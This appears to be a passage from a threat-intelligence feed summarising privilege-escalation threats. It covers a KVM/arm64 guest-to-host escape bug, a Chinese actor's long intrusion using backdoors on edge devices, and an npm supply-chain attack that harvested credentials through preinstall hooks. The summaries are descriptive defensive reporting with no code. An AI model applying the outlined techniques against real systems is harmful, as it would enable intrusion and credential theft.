Threats Tagged 't1068'

ITScape (CVE-2026-46316) is a guest-to-host escape vulnerability in the vGIC-ITS emulation within KVM/arm64, disclosed by researcher Hyunwoo Kim. The flaw stems from a race condition in the vgic_its_invalidate_cache() function causing a double-put use-after-free, enabling host kernel code execution. Since the bug exists in in-kernel KVM rather than QEMU user-space, successful exploitation grants host kernel privileges, posing significant risk to multi-tenant ARM64 cloud environments. The vulnerability can be chained with local privilege escalation when guest root access is unavailable. Affected kernels range from commit 8201d1028caa through 13031fb6b835, when the patch was applied. Two YARA rules have been developed for detection: one targeting hardcoded constants from the proof-of-concept, another identifying behavioral patterns in privilege drop sequences.

Chinese threat actor VerdantBamboo compromised a victim organization and its Managed Services Provider over an 18-month period, deploying malware on network edge devices lacking EDR coverage. The initial breach involved an Egnyte Storage Sync system, where attackers exploited a sudo misconfiguration for privilege escalation and installed BRICKSTORM backdoor and AGENTPSD fallback implant. Investigation revealed the MSP's pfSense firewall was also compromised with a FreeBSD variant of BRICKSTORM. After remediation, VerdantBamboo regained access through stolen firewall credentials, enabling custom VPN access and deploying PLENET backdoor on a Synology NAS. The threat actor leveraged compromised systems as proxies to access Microsoft 365 environments while evading security controls. VerdantBamboo demonstrated operational discipline by targeting appliances without EDR capabilities and using sophisticated malware including PLENET, compiled with .NET Native AOT to hinder analysis.

Microsoft Threat Intelligence discovered a large-scale npm supply chain attack compromising 32 malicious packages across over 90 versions under the @redhat-cloud-services scope. The compromise originated from the RedHatInsights/javascript-clients CI/CD pipeline, enabling attackers to publish trojanized packages through legitimate GitHub Actions OIDC workflows with authentic provenance signatures. The malicious packages executed a heavily obfuscated 4.29 MB dropper via npm preinstall hooks, which downloaded the Bun JavaScript runtime and launched payloads designed to harvest credentials from GitHub, npm, AWS, Azure, GCP, HashiCorp Vault, Kubernetes, and developer systems. The malware scraped GitHub Actions runner memory for secrets, escalated privileges using passwordless sudo, exfiltrated stolen data through GitHub infrastructure, and propagated by compromising additional maintainer packages with forged SLSA provenance. The campaign marker "Miasma: The Spreading Blight" was embedded throughout the malicious